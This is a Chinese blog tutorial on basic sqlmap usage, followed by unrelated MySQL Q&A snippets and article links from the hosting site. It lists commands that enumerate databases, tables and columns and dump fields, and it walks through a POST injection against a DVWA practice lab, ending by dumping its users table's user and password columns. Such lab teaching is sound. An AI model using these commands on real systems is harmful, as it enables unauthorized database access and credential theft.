程序员经验分享-hwhale

sqlmap的简单语法应用与实战操作

2023-11-18

利用sqlmap注入

原理

一种开源的渗透测试工具,可以自动检测和利用 Sql 注入漏洞以及接入该数据库的服务器。
它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令,使用 Sqlmap 工具将极大的简化我们的测试工作量。
Sqlmap 是一个自动化的 SQL 注入工具,其主要功能是扫描、发现并利用给定的 Url 的 Sql 注入漏洞。

接下来是语法:

sqlmap.py -u [" “] --dbs 查询所有的数据库名
sqlmap.py -u [” “] --current-db 查询所在数据库名
sqlmap.py -u [” “] --current-user 获取当前用户名称
sqlmap.py -u [” “] -D [‘数据库名’] --tables 列出表名
sqlmap.py -u [” “] -D [‘数据库名’] -T [‘表名’] --columns 列出(列名)字段
sqlmap.py -u [” "] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1’,’…’] --dump 获取字段内容

另外一种拓展变形:

用sqlmap跑post型注入:
语法:
sqlmap.py -r c:\python\1.txt

首先,开burp截包。

输入1,提交。
可以看见,burp已经把id获取到了
copy to file,保存为txt文件。
在这里插入图片描述

例如:

用sqlmap跑post型注入:
语法:
sqlmap.py -r c:\python\1.txt
在这里插入图片描述
可以看到,存在的注入类型(布尔盲注和时间盲注)和payload和数据库类型和版本都给你报出来了。
然后接下来的方式就跟跑GET的方法基本一致。

接下来是演示:

接上面的爆出的注入类型继续:

爆数据库名:
sqlmap.py -r c:\Python27\1.txt --current-db
在这里插入图片描述

爆表名:sqlmap.py -r c:\Python27\1.txt -D dvwa --tables
在这里插入图片描述

爆字段(列名):sqlmap.py -r c:\Python27\1.txt -D dvwa -T users --columns
在这里插入图片描述

爆数据:sqlmap.py -r c:\Python27\1.txt -D dvwa -T users -C user,password --dump
在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

mysql

安全

sqlmap的简单语法应用与实战操作 的相关文章

  • 忽略重复条目并在 EF Core 中的 DbContext.SaveChanges() 上提交成功条目

    我有一个 ASP Net Core 2 2 Web API 在我的一个控制器操作中 我向 MySQL 数据库表添加了一堆行 我使用的是 Pomelo 例如 dbContext AddRange entities dbContext Save

  • 将古吉拉特语文本插入 MySQL 表会产生垃圾字符和不可读的文本

    我有三个 MySQL 表 我正在向其中插入古吉拉特语内容 当我插入两个表时 它们插入得很好并且可读 但在一个表中 它显示垃圾字符 不可读的文本 我怎样才能解决这个问题 MySQL 有每个表的字符集设置 http dev mysql com

  • Laravel leftJoin 仅右表的最后一条记录

    我是 Laravel 的新手 我有两张桌子 1 产品 2 价格 products id product int p key name varchar prices id price int p key id product int

  • Mysql 创建定义器

    我创建了一个在 CentOS Web 服务器上运行的 Intranet Web 应用程序 该应用程序使用另一个本地服务器 始终是 CentOS 作为 MySQL 数据库 在数据库内部我创建了例程 这些例程总是这样开始 CREATE DEFI

  • MySQL 查询计算上个月

    我想计算上个月的订单总额 我收到了从当前日期获取当月数据的查询 SELECT SUM goods total AS Total Amount FROM orders WHERE order placed date gt date sub c

  • 将第三个表链接到多对多关联中的桥接表

    设计这个数据库的正确方法是什么 这是我设置表格的方式 我在名为 教师 的表和名为 仪器 的表之间存在多对多关系 然后我有一个连接两者的桥接表 我想将另一个表与 BRIDGE 表关联起来 意思是乐器 老师的组合 该表有 3 行 指定老师可以教

  • 如何使用 vitess 仅对特定表进行分片

    我创建了一个包含三个表的未分片键空间 现在我想对前两个表的键空间进行分片 但不想对第三个表进行分片 如何才能做到这一点 Vitess 文档不包含任何与此相关的信息或示例 请帮忙 Thanks vitess 中的垂直分片与水平分片类似 您应该

  • 在 PHP 字符串中格式化 MySQL 代码

    是否有任何程序 IDE 可以在 PHP 字符串中格式化 MySQL 代码 例如 我使用 PHPStorm IDE 但它无法做到这一点 它对 PHP 和 MYSQL 执行此操作 但不适用于 php 字符串内的 MYSQL 我已准备好使用新的

  • 我可以使用 HSQLDB 进行 junit 测试克隆 mySQL 数据库吗

    我正在开发一个 spring webflow 项目 我想我可以使用 HSQLDB 而不是 mysql 进行 junit 测试吗 如何将我的 mysql 数据库克隆到 HSQLDB 如果您使用 spring 3 1 或更高版本 您可以使用 s

  • MySQL:计算日期/时间之间的差异 - 仅在周一至周五“工作周”期间

    我需要计算开始日期 时间和结束日期 时间之间的差异 但是 我只想在 5 天的工作周内执行此操作 不包括周六 周日 做这个的最好方式是什么 我的想法是 从日期开始 我必须获取星期几 如果是工作日 那么我将添加到累加器中 如果不是 那么我不会添

  • 显示标准化数据

    跟进问题 添加 2 个不同表的总和 https stackoverflow com questions 39717541 adding sum from 2 different tables 我创建了3个表 members videos v

  • Galera 集群问题

    我想在我们的生产环境中使用Galera集群 但我有一些顾虑 每个表必须至少定义一个显式主键 每个表必须运行在InnoDB或XtraDB存储引擎下 分批处理您的大额交易 例如 不要让一个事务插入 100 000 行 而是将其分成更小的块 例如

  • 如何优化这个MySQL慢(非常慢)查询?

    我有一个 2 GB 的 mysql 表 包含 500k 行 我在没有负载的系统上运行以下查询 select from mytable where name in n1 n2 n3 n4 bunch more order by salary

  • Windows 8.1 升级后 Apache 无法工作 [关闭]

    Closed 这个问题不符合堆栈溢出指南 help closed questions 目前不接受答案 今天从 Windows 8 升级到 Windows 8 1 后 Apache 不再工作 我上次从 Windows 7 升级到 Window

  • 如何在 MySQL 中求和时间?

    正如您在图片中看到的 我有一份停机报告 显示了所选工厂在选定日期的停机时间 现在我想添加所有的值 Time Duration 列并将其显示在附近的单独显示中 TOTAL TIME DURATION 例如 在图像中 所选日期为 2015 年

  • 不带 GROUP BY 的聚合查询

    这个查询似乎在我的旧机器上完美运行 但是 在我的 MySQL 5 7 14 和 PHP 5 6 25 的新机器上 它会抛出错误 致命错误 未捕获异常 PDOException 并带有消息 SQLSTATE 42000 语法错误或访问冲突 1

  • libmysqlclient.a 和 libmysqlclient_r.a 有什么区别?

    我应该使用哪个来链接 mysqlclient 库 它们之间有什么区别 我似乎找不到答案 谢谢 较新版本的 MySQL 客户端发行版不包含 r 版本 有些可能有从 libmyqslclient r a 到 libmyqslclient a 的

  • 如果 Row1 = 值 1,则更新其他行

    我有一个小的 php 脚本 用于访问 mySql 数据库 我想在数据库中插入新记录之前查看该数字 值 1 是否等于数据库中的记录 这也在第 1 行 所以我想 查看传入的电话号码是否等于数据库中的电话号码 如果是这样 则必须保持电话号码相同的

  • MySQL 错误 1172 - 结果包含多行

    在存储过程中运行查询时 我从 MySQL 收到此错误 错误代码 1172 结果包含多行 我理解错误 我正在做一个SELECT INTO var list 因此查询需要返回单行 当我使用LIMIT 1 or SELECT DISTINCT 错

  • mysql 中的二进制、十六进制和八进制值

    我对在 mysql 数据库中使用二进制 十六进制和八进制系统非常感兴趣 首先 请给我一个建议 为什么我们在存储信息时需要它们 因为信息太多 或者为什么 另外 哪种类型的值必须存储在标记系统中 另外这里还有像 这是例子 gt SELECT 5

随机推荐

  • 麒麟服务器系统、CentOS系统扩展磁盘、根目录大小

    一 实际问题 服务器根目录占用53 只有13G可用 需要扩容磁盘 若没有单独分区给目录做存储 其他目录如 var lib 都是默认共享根目录空间大小的 若这些目录空间太小都可以通过扩容根目录大小解决 二 介绍部分 介绍 PV VG LV P

  • Set(List)与String互转

    一 Set与String互转 在处理JSON数据时 我发现想把数据取出来用set去重 然后toString后放回JSON 但是再取出来要转成Set时就出问题了 这是一个用例 JSONObject jsonObject new JSONObj

  • 【c++从菜鸡到王者】第五篇-( 全网最精华)条件编译ifdef的用法

    预处理指令 预处理指令是以 号开头的代码行 号必须是该行除了任何空白字符外的第一个字符 后是指令关键字 在关键字和 号之间允许存在任意个数的空白字符 整行语句构成了一条预处理指令 该指令将在编译器进行编译之前对源代码做某些转换 预处理指令是

  • Qt QTouchEvent 多点触控

    首先设置接收触控事件 setAttribute Qt WA AcceptTouchEvents true bool CollectionPoint event QEvent event switch event gt type case Q

  • 一,Docker安装与启动

    目录 1 安装Docker 2 设置ustc的镜像 3 Docker的启动与停止 3 常用命令 3 1 1 查看镜像 3 1 2 搜索镜像 3 1 3 拉取镜像 3 1 4 删除镜像 3 2 容器相关命令 3 2 1 查看容器 3 2 2

  • 包建强:为什么我说Android插件化从入门到放弃?

    转自 http www infoq com cn articles android plug ins from entry to give up 本文根据包建强在2016GMTC全球移动开发大会上的演讲整理而成 首先自我介绍一下 我叫包建强

  • 【c++】rand()随机函数的应用(一)——rand()函数详解和实例

    c 语言中可以用rand 函数生成随机数 今天来探讨一下rand 函数的基本用法和实际应用 本系列文章共分两讲 今天主要介绍一下伪随机数生成的原理 以及在伪随机数生成的基础上 生成随机数的技巧 下一讲主要介绍无重复随机数生成的方法和舒尔特方

  • 查看数据库表所占容量空间大小

    一 查看所有数据库容量大小 二 查看所有数据库各表容量大小 三 查看指定数据库容量大小 四 查看指定数据库各表容量大小 五 查看指定数据库指定表容量大小 数据库情况 一 查看所有数据库容量大小 SELECT table schema AS

  • 计算机病毒及其防治技术期末复习

    计算机病毒及其防治技术 总结复习 文章目录 计算机病毒及其防治技术 总结复习 第一章 概述 第二章 蠕虫 第三章 病毒结构 第四章 计算机病毒的技术特征 第五章 特洛伊木马 第六章 宏病毒 第七章 Linux病毒 第八章 移动终端恶意代码

  • 公务员备考(四十) 图推提升

    第一章 平面专题总结 一 线总结 1 曲线直线 曲直图形判断原则 有曲则为曲 无曲才为直 阴影图形不讨论曲直性 曲直规律图形特点 a 纯直线曲线图形 b 简笔画实物图形 c 单区域简单图形 d 内外结构图形 2 平行线 含回旋折线 a 轮廓

  • NeRF系列(1):NeRF: Representing Scenes as Neural Radiance Fields for View Synthesis 论文解读与公式推导(二)

    接上文 NeRF开山之石 NeRF Representing Scenes as Neural Radiance Fields for View Synthesis 论文解读与公式推导 一 LeapMay的博客 CSDN博客 本文提出了一种

  • out-of-tree模块做覆盖率统计

    1 准备如下测试用例 并编译成模块 hi c include

  • 一些比较好用的域名信息查询网站

    NSEC Lab 查询IP地址所在位置及可信程度 真人概率 的数值在50 以上 可以被认定为此IP的网页访问量基本由人类主动行为产生 分值愈高越真实 低于50 则有较高可能性是此IP的行为是机器人主导 ip地址归属地查询 可查询网站域名 解

  • Python编程进阶,常用8大技巧!

    整理字符串输入 整理用户输入的问题在编程过程中极为常见 通常情况下 将字符转换为小写或大写就够了 有时你可以使用正则表达式模块 Regex 完成这项工作 但是如果问题很复杂 可能有更好的方法来解决 user input This nstri

  • 关于RS485通讯中使用STM32串口以DMA方式发送数据丢失字节的问题

    1 开发平台 计算机操作系统 WIN7 64位 开发环境 Keil MDK 5 14 MCU STM32F407ZET6 STM32F4xx固件库 STM32F4xx DSP StdPeriph Lib V1 4 0 串口调试助手 2 问题

  • /usr/lib/libstdc++.so.6: version `GLIBCXX_3.4.15' not found错误的解决

    http www cnblogs com weinyzhou p 4983306 html 在安装cmake3 5 1运行 bootstrap的时候出现如下提示 code class hljs asciidoc has numbering

  • springboot整合shiro相关依赖和配置整理

    springboot整合shiro 一 shiro快速开始 去github下载shiro 找到samples quickstart文件夹 用idea打开它 点进shiro ini文件 这个时候idea会提示下载插件 下载它 二 新建一个sp

  • Spring Boot读取配置文件值 (@ConfigurationProperties注解或@Value注解)

    如何使用Java读取到properties文件中的内容 并且把它封装到JavaBean中 以供随时使用 传统方法 public class getProperties public static void main String args

  • tigervnc源码编译(Linux)

    tigervnc源码编译 Linux 目录 tigervnc源码编译 Linux 前言 编译环境 下载tigervnc源码 安装依赖及编译 报错及解决方法 cmake No package pixman 1 found Could NOT

  • sqlmap的简单语法应用与实战操作

    利用sqlmap注入 原理 一种开源的渗透测试工具 可以自动检测和利用 Sql 注入漏洞以及接入该数据库的服务器 它拥有非常强大的检测引擎 具有多种特性的渗透测试器 通过数据库指纹提取访问底层文件系统并通过外带连接执行命令 使用 Sqlma

热门标签